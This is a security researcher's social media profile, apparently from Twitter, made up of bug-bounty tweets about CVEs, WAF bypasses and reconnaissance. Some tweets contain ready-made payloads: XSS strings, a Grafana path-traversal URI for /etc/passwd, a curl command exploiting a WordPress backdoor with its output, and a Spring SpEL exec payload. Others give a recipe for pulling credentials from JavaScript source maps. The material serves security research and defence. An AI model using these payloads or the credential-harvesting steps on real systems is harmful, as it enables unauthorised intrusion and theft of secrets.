Abhishek Rautela @accesscheck
OSCP | Web Developer | Security Researcher | Noob | Blogger accesscheck.medium.com India Joined February 2021
Tweets 137 - Followers 72 - Following 150 - Likes 259
WAF bypasses XSS payload in JSON Payload: ["');alert('XSS');//"]@xyz.xxx #WAF #xss #BugBounty #BugBountytips
Need to make some quick $$? Here is a hack! No automated tools do either. 1) Find JavaScript files 2) ffuf -w js_files.txt -u FUZZ -mr "sourceMappingURL" 3) Download sourcemap 4) github.com/chbrown/unmap 5) Browse configs or just grep for API keys/Creds credit: @nullenc0de
OpenSSL 3.0.7 tarballs are posted here: openssl.org/source/openssl… It appears based on release notes that this is overblown. Would require a vulnerable TLS client to connect to a malicious server - more phishing-based attack versus remote RCE. #openssl
With reports of #Fortinet CVE-2022-40684 being exploited in the wild, we have detailed some early Indicators of Compromise in the following blog to help organizations assess their environments. horizon3.ai/fortinet-iocs-…
Master psychology and you can (damn-near) print money at will. Most people don't know how or where to start. These 12 TED Talks will teach you more about psychology than a four-year degree:
Today I got a notification on my phone that YouTube had sent me a copyright report, claiming one of my videos violated copyright and my channel was going to receive a strike. Except, my video didn't violate copyright. And YouTube didn't really send me a copyright report.
Here is my writeup about one of the web challenges named HORKOS in GoogleCTF 2022. The challenge is about insecure deserialization in JavaScript, the player needs to find a way to run JS code in the sandbox by exploiting the vulnerability. blog.huli.tw/2022/07/11/en/…
Exploiting AWS IAM Authenticator by crafting malicious signed STS GetCallerIdentity request. 👉CVE-2022-2385 blog.lightspin.io/exploiting-eks…
CVE-2022-32275 Grafana 8.4.3 allows reading files via (for example) a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd URI. cve.mitre.org/cgi-bin/cvenam…
#cycatz #bugbounty #bugbountytips Exploiting IRCTC along with few other government domains through XXE #RCE #XXE More..bit.ly/3wV0cra #appsec #infosec #pentest #appsec #ACL #Database #securitybreach #shodan #hacking
CVE-2022-1609 WordPress @momika233 Weblizar Backdoor $ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license' uid=33(www-data) gid=33(www-data) groups=33(www-data) #bugbounty #bugbountytips #nday
Atlassian Jira Seraph Authentication Bypass RCE CVE-2022-0540 raw.githubusercontent.com/Pear1y/CVE-202… #nday #bugbountytips #bugsbunny
Our technical analysis and POC for CVE-2022-22972 Authentication Bypass for #VMware Workspace ONE, vIDM, and vRealize Automation 7.6. horizon3.ai/vmware-authent… We've again passed our POC to @GreyNoiseIO to build early detections. #CyberSecurity
Want to do dir bruteforcing and parameter bruteforcing at the same time? GET ffuf -w "./dir.txt:DIR" -w ./params.txt -u https://EXAMPLE(.)COM/DIR?FUZZ=1 -t 300 -ac POST ffuf -w "./dir.txt:DIR" -w ./params.txt -u https://EXAMPLE(.)COM/DIR -X POST -d "FUZZ=1" -t 300 -ac
CVE-2022-22978 Spring Security RegexRequestMatcher Authorization Bypass EXP: %0d or %oa github.com/spring-project… nosec.org/m/share/5006.h…
Unsafe .Net Deserialization in Windows Event Viewer! This is a by-product of my research. Has confirmed with MSRC that this didn't cross any security boundary, but I guess it could still be another fun #LOLbas or Defender Bypass.😆
Multiple WAFs bypass that demonstrates various obfuscation techniques. <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
Spring Cloud Function Spel RCE aka CVE-2022-22963 POC. payload spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
Spring4Shell Class Loader Manipulation Chain (tested on JDK 11.0.14, Tomcat 9.0.60, Spring Boot 2.6.5)
